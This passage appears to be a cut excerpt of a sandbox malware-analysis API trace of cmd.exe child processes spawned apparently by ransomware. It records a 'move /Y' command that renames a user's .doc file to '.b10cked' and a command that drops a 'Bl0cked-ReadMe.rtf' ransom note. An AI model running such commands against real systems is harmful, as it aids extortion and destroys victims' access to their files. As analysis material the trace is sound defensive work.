lpData=0x28ecf0*=0x0, lpcbData=0x28ece8*=0x4) returned 0x0 [0140.134] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28ecec, lpData=0x28ecf0, lpcbData=0x28ece8*=0x1000 | out: lpType=0x28ecec*=0x4, lpData=0x28ecf0*=0x40, lpcbData=0x28ece8*=0x4) returned 0x0 [0140.134] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28ecec, lpData=0x28ecf0, lpcbData=0x28ece8*=0x1000 | out: lpType=0x28ecec*=0x4, lpData=0x28ecf0*=0x40, lpcbData=0x28ece8*=0x4) returned 0x0 [0140.134] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28ecec, lpData=0x28ecf0, lpcbData=0x28ece8*=0x1000 | out: lpType=0x28ecec*=0x0, lpData=0x28ecf0*=0x40, lpcbData=0x28ece8*=0x1000) returned 0x2 [0140.134] RegCloseKey (hKey=0x40) returned 0x0 [0140.134] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28ece4 | out: phkResult=0x28ece4*=0x40) returned 0x0 [0140.134] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28ecec, lpData=0x28ecf0, lpcbData=0x28ece8*=0x1000 | out: lpType=0x28ecec*=0x0, lpData=0x28ecf0*=0x40, lpcbData=0x28ece8*=0x1000) returned 0x2 [0140.134] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28ecec, lpData=0x28ecf0, lpcbData=0x28ece8*=0x1000 | out: lpType=0x28ecec*=0x4, lpData=0x28ecf0*=0x1, lpcbData=0x28ece8*=0x4) returned 0x0 [0140.134] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28ecec, lpData=0x28ecf0, lpcbData=0x28ece8*=0x1000 | out: lpType=0x28ecec*=0x0, lpData=0x28ecf0*=0x1, lpcbData=0x28ece8*=0x1000) returned 0x2 [0140.134] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28ecec, lpData=0x28ecf0, lpcbData=0x28ece8*=0x1000 | out: lpType=0x28ecec*=0x4, lpData=0x28ecf0*=0x0, lpcbData=0x28ece8*=0x4) returned 0x0 [0140.134] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28ecec, lpData=0x28ecf0, lpcbData=0x28ece8*=0x1000 | out: lpType=0x28ecec*=0x4, lpData=0x28ecf0*=0x9, lpcbData=0x28ece8*=0x4) returned 0x0 [0140.134] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28ecec, lpData=0x28ecf0, lpcbData=0x28ece8*=0x1000 | out: lpType=0x28ecec*=0x4, lpData=0x28ecf0*=0x9, lpcbData=0x28ece8*=0x4) returned 0x0 [0140.134] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28ecec, lpData=0x28ecf0, lpcbData=0x28ece8*=0x1000 | out: lpType=0x28ecec*=0x0, lpData=0x28ecf0*=0x9, lpcbData=0x28ece8*=0x1000) returned 0x2 [0140.134] RegCloseKey (hKey=0x40) returned 0x0 [0140.134] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88636e [0140.134] srand (_Seed=0x5b88636e) [0140.134] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\WNPDVD~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\WnPdVDXwSUv.doc.b10cked\"" [0140.134] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\WNPDVD~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\WnPdVDXwSUv.doc.b10cked\"" [0140.135] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.135] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3c1978, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0140.135] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0140.135] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0140.135] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0140.135] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0140.135] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0140.135] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0140.135] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0140.135] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0140.135] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0140.135] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0140.135] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0140.135] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0140.136] GetEnvironmentStringsW () returned 0x3c2368* [0140.136] FreeEnvironmentStringsW (penv=0x3c2368) returned 1 [0140.136] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.136] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0140.136] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0140.136] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0140.136] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0140.136] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0140.136] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0140.136] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0140.136] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0140.136] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0140.136] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x28fab0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.136] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x28fab0, lpFilePart=0x28faac | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x28faac*="Desktop") returned 0x18 [0140.136] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0140.136] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x28f82c | out: lpFindFileData=0x28f82c) returned 0x3c09f8 [0140.136] FindClose (in: hFindFile=0x3c09f8 | out: hFindFile=0x3c09f8) returned 1 [0140.136] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x28f82c | out: lpFindFileData=0x28f82c) returned 0x3c09f8 [0140.137] FindClose (in: hFindFile=0x3c09f8 | out: hFindFile=0x3c09f8) returned 1 [0140.137] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x28f82c | out: lpFindFileData=0x28f82c) returned 0x3c09f8 [0140.137] FindClose (in: hFindFile=0x3c09f8 | out: hFindFile=0x3c09f8) returned 1 [0140.137] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0140.137] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0140.137] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0140.137] GetEnvironmentStringsW () returned 0x3c0218* [0140.137] FreeEnvironmentStringsW (penv=0x3c0218) returned 1 [0140.137] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.138] GetConsoleOutputCP () returned 0x1b5 [0140.138] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0140.138] GetUserDefaultLCID () returned 0x409 [0140.138] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0140.139] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x28fbf0, cchData=128 | out: lpLCData="0") returned 2 [0140.139] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x28fbf0, cchData=128 | out: lpLCData="0") returned 2 [0140.139] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x28fbf0, cchData=128 | out: lpLCData="1") returned 2 [0140.139] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0140.139] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0140.139] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0140.139] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0140.139] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0140.139] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0140.139] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0140.139] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0140.139] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0140.139] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0140.139] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0140.140] GetConsoleTitleW (in: lpConsoleTitle=0x3b0938, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.140] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0140.140] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0140.140] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0140.141] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0140.141] _wcsicmp (_String1="move", _String2=")") returned 68 [0140.141] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0140.141] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0140.141] _wcsicmp (_String1="IF", _String2="move") returned -4 [0140.142] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0140.142] _wcsicmp (_String1="REM", _String2="move") returned 5 [0140.142] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0140.146] GetConsoleTitleW (in: lpConsoleTitle=0x28f8e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.146] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0140.146] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0140.146] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0140.147] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0140.147] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0140.147] _wcsicmp (_String1="move", _String2="CD") returned 10 [0140.147] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0140.147] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0140.147] _wcsicmp (_String1="move", _String2="REN") returned -5 [0140.147] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0140.147] _wcsicmp (_String1="move", _String2="SET") returned -6 [0140.147] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0140.147] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0140.147] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0140.147] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0140.147] _wcsicmp (_String1="move", _String2="MD") returned 11 [0140.147] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0140.147] _wcsicmp (_String1="move", _String2="RD") returned -5 [0140.147] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0140.147] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0140.147] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0140.147] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0140.147] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0140.147] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0140.147] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0140.147] _wcsicmp (_String1="move", _String2="VER") returned -9 [0140.147] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0140.147] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0140.147] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0140.147] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0140.147] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0140.147] _wcsicmp (_String1="move", _String2="START") returned -6 [0140.147] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0140.147] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0140.147] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0140.149] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0140.149] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0140.149] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x28f6a4, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x28f69c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x28f69c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0140.150] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0140.150] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0140.150] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0140.150] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0140.150] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0140.150] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0140.150] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0140.150] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0140.150] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0140.150] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0140.150] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0140.150] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0140.150] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0140.150] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0140.150] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0140.150] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0140.150] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0140.150] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0140.150] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0140.150] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0140.150] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0140.150] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0140.150] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0140.150] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0140.150] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0140.150] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0140.150] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0140.150] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0140.150] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0140.150] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0140.150] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0140.151] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0140.151] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0140.151] _wcsicmp (_String1="WNPDVD~1.DOC", _String2=".") returned 73 [0140.151] _wcsicmp (_String1="WNPDVD~1.DOC", _String2="..") returned 73 [0140.151] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\WNPDVD~1.DOC" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\wxmd5u~1\\wnpdvd~1.doc")) returned 0x20 [0140.151] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3c1f28 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.151] SetErrorMode (uMode=0x0) returned 0x0 [0140.152] SetErrorMode (uMode=0x1) returned 0x0 [0140.152] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\WNPDVD~1.DOC", nBufferLength=0x104, lpBuffer=0x28f02c, lpFilePart=0x28f014 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\WNPDVD~1.DOC", lpFilePart=0x28f014*="WNPDVD~1.DOC") returned 0x3f [0140.152] SetErrorMode (uMode=0x0) returned 0x1 [0140.152] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\wxmd5u~1")) returned 0x12 [0140.152] _wcsicmp (_String1="WNPDVD~1.DOC", _String2=".") returned 73 [0140.152] _wcsicmp (_String1="WNPDVD~1.DOC", _String2="..") returned 73 [0140.152] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\WNPDVD~1.DOC" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\wxmd5u~1\\wnpdvd~1.doc")) returned 0x20 [0140.152] SetErrorMode (uMode=0x0) returned 0x0 [0140.152] SetErrorMode (uMode=0x1) returned 0x0 [0140.152] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\WNPDVD~1.DOC", nBufferLength=0x104, lpBuffer=0x28f4a8, lpFilePart=0x28f240 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\WNPDVD~1.DOC", lpFilePart=0x28f240*="WNPDVD~1.DOC") returned 0x3f [0140.152] SetErrorMode (uMode=0x0) returned 0x1 [0140.152] SetErrorMode (uMode=0x0) returned 0x0 [0140.152] SetErrorMode (uMode=0x1) returned 0x0 [0140.152] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\WnPdVDXwSUv.doc.b10cked", nBufferLength=0x104, lpBuffer=0x28f6b0, lpFilePart=0x28f240 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\WnPdVDXwSUv.doc.b10cked", lpFilePart=0x28f240*="WnPdVDXwSUv.doc.b10cked") returned 0x4a [0140.152] SetErrorMode (uMode=0x0) returned 0x1 [0140.152] SetLastError (dwErrCode=0x0) [0140.153] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\WnPdVDXwSUv.doc.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\wxmd5u~1\\wnpdvdxwsuv.doc.b10cked")) returned 0xffffffff [0140.153] GetLastError () returned 0x2 [0140.153] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\WNPDVD~1.DOC", fInfoLevelId=0x1, lpFindFileData=0x28ebbc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28ebbc) returned 0x3c2138 [0140.153] FindNextFileW (in: hFindFile=0x3c2138, lpFindFileData=0x28ebbc | out: lpFindFileData=0x28ebbc) returned 0 [0140.153] GetLastError () returned 0x12 [0140.153] FindClose (in: hFindFile=0x3c2138 | out: hFindFile=0x3c2138) returned 1 [0140.155] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\WNPDVD~1.DOC", fInfoLevelId=0x1, lpFindFileData=0x3c1cc8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3c1cc8) returned 0x3c2138 [0140.155] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\WnPdVDXwSUv.doc.b10cked", nBufferLength=0x104, lpBuffer=0x28ee54, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\WnPdVDXwSUv.doc.b10cked", lpFilePart=0x0) returned 0x4a [0140.155] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\WnPdVDXwSUv.doc", nBufferLength=0x104, lpBuffer=0x28ee54, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\WnPdVDXwSUv.doc", lpFilePart=0x0) returned 0x42 [0140.155] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\WnPdVDXwSUv.doc" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\wxmd5u~1\\wnpdvdxwsuv.doc")) returned 0x20 [0140.155] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\WnPdVDXwSUv.doc" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\wxmd5u~1\\wnpdvdxwsuv.doc"), lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\WnPdVDXwSUv.doc.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\wxmd5u~1\\wnpdvdxwsuv.doc.b10cked"), dwFlags=0x3) returned 1 [0140.156] FindClose (in: hFindFile=0x3c2138 | out: hFindFile=0x3c2138) returned 1 [0140.156] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x28ee08 | out: _Buffer=" 1") returned 9 [0140.156] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.156] GetFileType (hFile=0x7) returned 0x2 [0140.851] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0140.851] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28ed94 | out: lpMode=0x28ed94) returned 1 [0140.851] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.852] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x28edc8 | out: lpConsoleScreenBufferInfo=0x28edc8) returned 1 [0140.852] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0140.852] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x28ee08 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0140.852] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x28edec, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28edec*=0x1a) returned 1 [0140.853] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.853] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0140.853] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.853] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0140.853] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.853] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0140.853] SetConsoleInputExeNameW () returned 0x1 [0140.853] GetConsoleOutputCP () returned 0x1b5 [0140.853] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0140.853] SetThreadUILanguage (LangId=0x0) returned 0x409 [0140.853] exit (_Code=0) Process: id = "150" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16620" os_pid = "0xd3c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 14536 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name 